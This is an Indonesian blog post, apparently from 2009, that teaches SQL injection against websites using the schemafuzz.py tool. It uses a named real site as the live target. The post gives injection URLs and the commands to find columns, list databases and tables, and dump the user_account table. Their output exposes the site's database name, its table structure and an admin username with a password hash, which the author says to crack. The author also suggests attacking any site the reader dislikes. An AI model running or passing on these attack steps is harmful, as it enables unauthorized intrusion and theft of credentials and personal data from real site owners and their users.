>Web Hacking with Schemafuzzy Method

November 15, 2009 at 7:11 pm | Posted in Article, computer and high technology, Hacking, Tutorial | Leave a comment

>salam hi-tech….

pastinya hacking web dengan metode schemafuzzy udah gak asing lagi bagi kita. dunia maya terutama hacking semakin digemari. ini emrupakan tutorial singkat yang saya dapat dari YF probolinggo yang ditulis oleh kawan phychole. Oke untuk melakukan hal ini ada beberapa hal yang kita butuhkan.

1. Komputer (bisa pc, notebook, netbook)
2. Koneksi internet (silahkan pilih ISP yang anda percayai)
3. Program Python-2.5 (bisa minta ke om google)
4. script schemafuzzy.py (minta ke darkc0de.com)
5. CMD
6. target website (cari di google atau bisa web yang paling kamu benci)
7. Kopi(rcomended)
8. ROKOK (recomended)
9. camilan(wajib)
10. teman pendamping(harus)

Oke udah di siapkan semua khan????

langsung ada ya.. install terlebih dahulu python-2.5 kamu. Copy python.py ke dalam dir python-2.5. Kalo sudah selesai langsung jalankan. Caranya

klik start>>Run>>CMD

udah masuk ke cmd khan,,, defautlkan dulu cmdnya denga perintah “cd\” (tanpa tanda kutip) sehingga tulisannya menjadi

c:\

lalu masuk kedir python-2.5 dengan perintah “cd phython-2.5” hingga muncul tulisan

c:\python-2.5

kita mulai bekerja dari mulai sini. Oke kamu sudah dapat target?? kita mulai aksi kita.

perintah dasar schemafuzzy ini yaitu

schemafuzzy.py -u “target” –perintah

1. kita gunakan di target kita. disini saya ambil target

http://www.primausada.com/news.php?news_id=9

2. Cek kolomnya

schemafuzz.py -u http://www.primausada.com/news.php?news_id=9″ –findcol

Hingga muncul
============================================================

|———————————————————|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|———————————————————|

[+] URL:http://www.primausada.com/news.php?news_id=9–
[+] Evasion Used: “+” “–“
[+] 20:36:08
[+] Proxy Not Given
[+] Attempting To find the number of columns…
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,1,2,3–
[+] darkc0de URL: http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3
[-] Done!

==========================================================

Nah…. gunakan
http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3
Untuk membedah web target kita.

3. Cari Db nya..

schemafuzz.py -u “http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3” –dbs

hingga muncul

==========================================================

|———————————————————|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|———————————————————|

[+] URL:http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3–
[+] Evasion Used: “+” “–“
[+] 20:42:20
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: t59395_primausada
User: t59395_pu@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0] t59395_primausada

[-] [20:42:22]
[-] Total URL Requests 3
[-] Done

==========================================================

Nah.. sudah kita temukan database web tersebut.. t59395_primausada 😛

4. Cari nama table dalam database

schemafuzz.py -u “http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3” –schema -D t59395_primausada

akan muncul

==========================================================

|———————————————————|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|———————————————————|

[+] URL:http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3–
[+] Evasion Used: “+” “–“
[+] 20:45:26
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: t59395_primausada
User: t59395_pu@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database “t59395_primausada”
[+] Number of Tables: 10

[Database]: t59395_primausada
[Table: Columns]
[0]detoks: detoks_id,topic_id,detoks_content,insert_by,update_by
[1]detoks_topic: topic_id,topic
[2]klinik: klinik_id,topic_id,klinik_content,insert_by,update_by
[3]klinik_topic: topic_id,topic
[4]news: news_id,news_date,update_date,news_title,news_summary,news_content,insert_by,update_by,front_yn
[5]product: product_id,product_img,product_name,product_cat,product_desc,product_use,product_price,insert_by,update_by
[6]product_category: category_codes,category_desc,insert_by,update_by
[7]profile: content_id,content,insert_by,update_by
[8]testimonial: testi_id,patient_name,patient_age,patient_gender,patient_reg_date,patient_phone,testi_date,testi_content,testi_pict_link,update_by,insert_by
[9]user_account: user_id,username,password,first_name,last_name,create_date

[-] [20:46:40]
[-] Total URL Requests 59
[-] Done

==========================================================

nah.. keluar semua colomnya… dari sini kita mengetahui bahwa web tersebut memiliki 10 colomn. Sekarang kita tinggal pilih kolom yang akan kita exploit ….

5. Exploit table dan kolom

schemafuzz.py -u “http:///www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3” –dump -D t59395_primausada -T config -C username,password

dan akan muncul

==========================================================

|———————————————————|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|———————————————————|

[+] URL:http://www.primausada.com/news.php?news_id=9+AND+1=2+UNION+SELECT+0,darkc0de,2,3–
[+] Evasion Used: “+” “–“
[+] 20:51:54
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: t59395_primausada
User: t59395_pu@localhost
Version: 5.0.32-Debian_7etch8
[+] Dumping data from database “t59395_primausada” Table “user_account”
[+] Column(s) [‘username’, ‘password’]
[+] Number of Rows: 1

[0] adhika:*E1EE7BF406887B7D4B90343450ADC71C267B9087:*E1EE7BF406887B7D4B90343450ADC71C267B9087:

[-] [20:52:01]
[-] Total URL Requests 3
[-] Done

==========================================================

Lihat ” adhika:*E1EE7BF406887B7D4B90343450ADC71C267B9087:*E1EE7BF406887B7D4B90343450ADC71C267B9087: “

ini adalah username dan password… keluar sudah. tinggal decript aja MD5 nya ke bentuk aslinya… hehehe. Cara ini hanya berlaku untuk sql versi 5. untuk versi 4, anda bisa minta ke google. HIKS sql4 amat susah um. kita juga lom bisa soalnya blind😛

oke sekian dari saya.

segala penyalah gunaan dari artikel ini bukan Tanggung jawab penulis.

Semoga bermanfaat bagi anda.

disadur dari YF probolinggo dan writes by phychole

Leave a Comment »

RSS feed for comments on this post. TrackBack URI

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Create a free website or blog at WordPress.com.
Entries and comments feeds.

%d bloggers like this: